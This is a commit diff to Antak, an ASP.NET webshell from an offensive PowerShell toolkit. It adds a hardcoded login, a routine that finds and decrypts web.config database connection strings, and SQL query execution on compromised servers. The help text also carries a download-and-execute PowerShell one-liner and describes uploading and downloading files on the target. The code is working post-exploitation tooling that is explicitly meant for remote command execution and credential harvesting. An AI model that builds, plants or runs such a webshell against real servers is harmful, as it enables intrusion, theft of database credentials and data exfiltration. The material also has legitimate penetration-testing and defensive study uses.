Antak can now execute SQL queries. Closes Issue #17

samratashok · samratashok · commit b0055e929b70 · 2015-08-19T16:26:26.000+05:30
This updated adds ability to execute SQL queries to Antak and adds simple authentication to restrict access to it. It also closes Issue #17.
diff --git a/Antak-WebShell/antak.aspx b/Antak-WebShell/antak.aspx
@@ -2,16 +2,34 @@
 <%@ Import Namespace="System.Diagnostics" %>
 <%@ Import Namespace="System.IO" %>
 <%@ Import Namespace="System.IO.Compression" %>
-
-<%--Antak - A Webshell which utilizes powershell.--%>
+<%@ Import Namespace="Microsoft.VisualBasic" %>
+<%--Antak - A Webshell which utilizes PowerShell.--%>
 
 <script Language="c#" runat="server">
-protected override void OnInit(EventArgs e)
-{
-    output.Text = @"Welcome to Antak - A Webshell in Powershell
+
+    protected void Login_Click(object sender, EventArgs e)
+    {
+        // WARNING: Don't be lazy, change values below for username and password. Default credentials are disastrous.
+        // Default Username is "Disclaimer" and Password is "ForLegitUseOnly" without quotes and case-sensitive.
+        if (Username.Text == "Disclaimer" && Password.Text == "ForLegitUseOnly")
+        {
+            execution.Visible = true;
+            execution.Enabled = true;
+            authentication.Visible = false;
+            output.Text = @"Welcome to Antak - A Webshell which utilizes PowerShell
 Use help for more details.
 Use clear to clear the screen.";
+        }
+    }
+
+    protected override void OnInit(EventArgs e)
+    {
+        execution.Visible = false;
+        execution.Enabled = false;
 }
+
+
+
 string do_ps(string arg)
 {
     //This section based on cmdasp webshell by http://michaeldaw.org
@@ -35,7 +53,7 @@ void ps(object sender, System.EventArgs e)
         output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
 while using commands (like changing current directory or running session aware scripts). 
 
-Executing PowerShell scripts on the target - 
+- Scripts can be executed on the target using any of the below methods:
 1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
 
 2. Use powershell one-liner (example below) for download & execute in the command box.
@@ -46,21 +64,27 @@ IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Argument
 4. Make the script a semi-colon separated one-liner.
 
 
-Files can be uploaded and downloaded using the respective buttons.
-
-Uploading a file - 
+- Uploading a file:
 To upload a file you must mention the actual path on server (with write permissions) in command textbox. 
 (OS temporary directory like C:\Windows\Temp may be writable.)
 Then use Browse and Upload buttons to upload file to that path.
 
-Downloading a file - 
+- Downloading a file:
 To download a file enter the actual path on the server in command textbox.
 Then click on Download button.
 
+- SQL Queries could be executed by following below steps:
+1. Click on 'Parse Web.Config' button to get dabase connection string. By default, Antak looks for web.config in
+the C:\Inetpub directory. You can specify a full path in the command box to look for web.config in other directory.
+2. Paste that connection string in the textbox besides the 'Execute SQL Query' button.
+3. Enter the SQL Query in the command box.
+4. Click the 'Execute SQL Query' button.
+
+
 Antak is a part of Nishang and updates could be found here:
 https://github.com/samratashok/nishang
-A detailed blog post on Antak could be found here
-http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
+Blog posts about Antak could be found here
+http://www.labofapenetrationtester.com/search/label/Antak
 
 ";
         console.Text = string.Empty;
@@ -89,12 +113,18 @@ void execcommand(string cmd)
     console.Focus();
 }
 
-void base64encode(object sender, System.EventArgs e)
+void base64encode(string inputstr)
 {
 // Compression and encoding directly stolen from Compress-PostScript by Carlos Perez
 //http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
     
     string contents = console.Text;
+    
+    if (inputstr != "null")
+    {
+        contents = inputstr;
+    }
+    
     // Compress Script
 
 
@@ -124,7 +154,6 @@ void base64encode(object sender, System.EventArgs e)
 
     execcommand(command);
 
-
 }
 protected void uploadbutton_Click(object sender, EventArgs e)
 {
@@ -164,29 +193,74 @@ protected void downloadbutton_Click(object sender, EventArgs e)
         }
 }
 
+protected void encode_Click(object sender, EventArgs e)
+{
+    base64encode("null");
+}
+
+// PowerShell logic in ConnectionStr_Click and executesql_Click taken from https://github.com/NetSPI/cmdsql
+protected void ConnectionStr_Click(object sender, EventArgs e)
+{
+    output.Text = @"By default, web.config is searched for in C:\inetpub. To look at other location, specify the full path in the command textbox.
+
+";
+    string webpath = "C:\\inetpub";
+    if (console.Text != string.Empty)
+    {
+        webpath = console.Text;
+    }
+    string pscode = "$ErrorActionPreference = \'SilentlyContinue\';$path=" + "\"" + webpath + "\"" +  ";" + "Foreach ($file in (get-childitem $path -Filter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };if ($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp\\$tempdir -ItemType directory | out-null; copy-item $file.FullName $env:temp\\$tempdir;$aspnet_regiis = (get-childitem $env:windir\\microsoft.net\\ -Filter aspnet_regiis.exe -recurse | select-object -last 1).FullName + \' -pdf \"\"connectionStrings\"\" \' + $env:temp + \'\\\' + $tempdir;Invoke-Expression $aspnet_regiis; Try { $xml = [xml](get-content $env:temp\\$tempdir\\$file) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };remove-item $env:temp\\$tempdir -recurse};Foreach ($_ in $connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host \"\"$file.Fullname --- $_.connectionString\"\"} } };";
+    base64encode(pscode);
+}
+
+protected void executesql_Click(object sender, EventArgs e)
+{
+    output.Text = @"Use a connection string retrieved from the server and copy it in the connection string textbox.
 
+";
+    string Constr = sqlconnectiostr.Text;
+    string sqlcmd = console.Text;
+    string pscode = "$Connection = New-Object System.Data.SQLClient.SQLConnection;$Connection.ConnectionString = " + "\"" + Constr + "\"" + ";" + "$Connection.Open();$Command = New-Object System.Data.SQLClient.SQLCommand;$Command.Connection = $Connection;$Command.CommandText = " + "\"" + sqlcmd + "\"" + ";" +  "$Reader = $Command.ExecuteReader();while ($reader.Read()) {;New-Object PSObject -Property @{Name = $reader.GetValue(0)};};$Connection.Close()";
+    base64encode(pscode);
+    
+}
 </script>
 <HTML>
 <HEAD>
 <title>Antak Webshell</title>
 </HEAD> 
 <body bgcolor="#808080">
+
 <div>
+
 <form id="Form1" method="post" runat="server" style="background-color: #808080">
-    <div style="text-align:center; resize:vertical">
+    <asp:Panel ID="authentication" runat="server" HorizontalAlign="Center" >
+    <asp:TextBox ID="Username" runat="server" style="margin-left: 0px" Width="300px"></asp:TextBox> <br />
+    <asp:TextBox ID="Password" runat="server" Width="300px"></asp:TextBox><br />
+    <asp:Button ID="Login" runat="server" Text="Login" OnClick="Login_Click" Width="101px"/><br />
+    </asp:Panel>
+     <asp:Panel ID="execution" runat="server" >
+    <div runat="server" style="text-align:center; resize:vertical">
+
     <asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox>
     <asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox>
     
 
     </div>
-    <div style="width: 1100px; text-align:center">
+    <div runat="server" style="width: auto; text-align:center">
+
         <asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" />
         <asp:FileUpload ID="upload" runat="server"/>
+        
         <asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" />
-        <asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="base64encode" />
-        <asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" />
+        <asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="encode_Click"/>
+        <asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" /> <br />
+        <asp:Button ID="ConnectionStr" runat="server" Text="Parse web.config" OnClick="ConnectionStr_Click"/>
+        <asp:Button ID="executesql" runat="server" Text="Execute SQL Query" OnClick="executesql_Click" />
+        <asp:TextBox ID="sqlconnectiostr" runat="server" Width="352px">Enter Connection String here to Execute SQL Queries</asp:TextBox>
     </div>
-    
+         
+    </asp:Panel >
     </form>
 
 
